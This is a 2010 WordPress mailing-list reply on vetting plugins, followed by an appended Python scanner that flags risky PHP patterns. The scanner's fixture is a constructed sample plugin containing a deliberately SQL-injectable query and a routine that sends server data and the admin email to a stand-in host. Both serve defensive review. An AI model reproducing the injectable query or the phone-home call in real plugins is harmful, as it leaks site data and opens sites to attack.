[wp-hackers] How to check a new plugin?

Eric Mann eric at eam.me
Mon Nov 22 18:10:27 UTC 2010


I use multiple tests:

   1. Install it on a test server to make sure that it actually works with
   the version of WordPress it claims
   2. Point a basic vulnerability scanner at the system (here's one called
   WordPress Scanner: http://blogsecurity.net/wordpress/tools/wp-scanner)
   3. Pull the source down and do a quick sanity check

Step 3 is actually more valuable to me than step 2.  Even if a plug-in
"works" and doesn't raise any red flags, it could still be doing something
you don't want to your system.  You can make sure the plug-in doesn't add
unnecessary database tables, doesn't email your sensitive information to 3rd
parties, escapes user input before processing database queries, etc.

So make sure the plug-in works as advertised, then do a quick walkthrough of
the code to make sure it's not doing anything funky.  Any steps beyond that
just add to the security of your system, but might make it harder to
maintain things as new versions come out or as new plug-ins are requested.

On Mon, Nov 22, 2010 at 9:56 AM, Patrick Laverty
<patrick_laverty at brown.edu>wrote:

> When you want to add a new plugin to your system, what do you do to check
> it out for its safety and security on your blog?  I'm in charge of a ms
> instance at a University and I get requests for plugins all the time,
> especially for ones that are on version <1 or admit they're "alpha" or
> "beta" versions.  I don't want to simply reject something because of its
> label, but I'm not totally sure how to evaluate a new plugin.  Do any of
> you put them on a test server and then point a vulnerability scanner at
> the new plugin to see what happens?  Advice?
>
> Thanks.
> _______________________________________________
> wp-hackers mailing list
> wp-hackers at lists.automattic.com
> http://lists.automattic.com/mailman/listinfo/wp-hackers
>
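Eric's step 3 (pull the source and look for new tables, mail to third parties, and unescaped input in database queries) can be partly mechanised as a first pass before reading the code by hand. The script below is an added example, not something posted in this thread or shipped with WordPress: it greps a plugin's PHP line by line for those patterns, plus the obfuscation calls that usually mean "something funky". The check names and the sample plugin it scans are constructed for this example; a real review still reads the flagged lines in context, since a line-based grep misses multi-line statements and cannot tell where a variable came from.

```python
"""Quick source sanity check for a WordPress plugin (added example, not from the thread).

Flags, per line of PHP: new database tables, outgoing e-mail, outbound HTTP,
obfuscated code, and $wpdb queries built from PHP variables without
$wpdb->prepare().  Triage aid only; it works one line at a time.
"""
import re
from dataclasses import dataclass
from pathlib import Path


@dataclass
class Finding:
    check: str
    file: str
    line: int
    text: str
    why: str


# Single-line pattern checks.  The check names are this example's own.
SIMPLE_CHECKS = [
    ("creates-table", re.compile(r"CREATE\s+TABLE|\bdbDelta\s*\(", re.I),
     "adds a database table; confirm it is needed and dropped on uninstall"),
    ("sends-mail", re.compile(r"\b(wp_mail|mail)\s*\("),
     "sends e-mail; check the recipient and what data goes in the body"),
    ("outbound-http", re.compile(r"\b(wp_remote_(get|post|request|head)|curl_init|fsockopen)\s*\("),
     "talks to a remote host; check where, and what it sends"),
    ("obfuscation", re.compile(r"\b(eval|base64_decode|gzinflate|str_rot13)\s*\("),
     "runs or decodes hidden code; legitimate plugins rarely need this"),
]

# $wpdb calls whose SQL argument must go through $wpdb->prepare() when it
# contains anything variable.  The table prefix is not user input, so it is
# stripped before looking for '$'.
WPDB_CALL = re.compile(r"\$wpdb->(query|get_results|get_var|get_row|get_col)\s*\((.*)$")
PREFIX = re.compile(r"\{?\$wpdb->prefix\}?")


def scan_source(src: str, filename: str = "<string>") -> list[Finding]:
    """Return findings for one PHP source text, in line order."""
    findings: list[Finding] = []
    for lineno, line in enumerate(src.splitlines(), start=1):
        stripped = line.strip()
        if stripped.startswith(("//", "#", "*", "/*")):
            continue  # skip comment lines so commented-out code is not flagged
        for name, pattern, why in SIMPLE_CHECKS:
            if pattern.search(line):
                findings.append(Finding(name, filename, lineno, stripped, why))
        m = WPDB_CALL.search(line)
        if m:
            args = PREFIX.sub("", m.group(2))
            if "$wpdb->prepare" not in args and "$" in args:
                findings.append(Finding(
                    "unsafe-sql", filename, lineno, stripped,
                    "SQL built from a PHP variable without $wpdb->prepare(); "
                    "check where the variable comes from"))
    return findings


def scan_plugin_dir(plugin_dir: str) -> list[Finding]:
    """Scan every .php file under an unpacked plugin directory."""
    findings: list[Finding] = []
    for path in sorted(Path(plugin_dir).rglob("*.php")):
        findings.extend(scan_source(path.read_text(errors="replace"), str(path)))
    return findings


# Constructed sample plugin for this example; it is not a real plugin.
SAMPLE_PLUGIN = r'''<?php
/*
Plugin Name: Example Widget (constructed sample, not a real plugin)
*/
function ew_install() {
    global $wpdb;
    $table = $wpdb->prefix . 'ew_hits';
    $sql = "CREATE TABLE $table (id bigint NOT NULL AUTO_INCREMENT, PRIMARY KEY (id))";
    require_once ABSPATH . 'wp-admin/includes/upgrade.php';
    dbDelta($sql);
}
function ew_lookup() {
    global $wpdb;
    $id = $_GET['id'];
    // unsafe: request parameter interpolated straight into the query
    $row = $wpdb->get_row("SELECT * FROM {$wpdb->prefix}ew_hits WHERE id = $id");
    // safe: placeholder plus $wpdb->prepare()
    $row2 = $wpdb->get_row($wpdb->prepare("SELECT * FROM {$wpdb->prefix}ew_hits WHERE id = %d", $id));
    return $row;
}
function ew_phone_home() {
    wp_mail('stats@example.invalid', 'new install', get_option('admin_email'));
    wp_remote_post('https://example.invalid/collect', array('body' => $_SERVER));
}
'''

if __name__ == "__main__":
    import sys
    # Usage: python check_plugin.py /path/to/unpacked/plugin   (or no argument for the sample)
    results = (scan_plugin_dir(sys.argv[1]) if len(sys.argv) > 1
               else scan_source(SAMPLE_PLUGIN, "sample.php"))
    for f in results:
        print(f"{f.file}:{f.line}: [{f.check}] {f.text}\n    {f.why}")
```

On the sample it reports the CREATE TABLE string and the dbDelta() call, the get_row() built from $id, the wp_mail() call and the wp_remote_post() call, and stays quiet on the prepare()'d query. Every hit is a place to start reading, not a verdict; the prefix stripping and comment skipping exist only to keep the noise low enough that the list is worth reading.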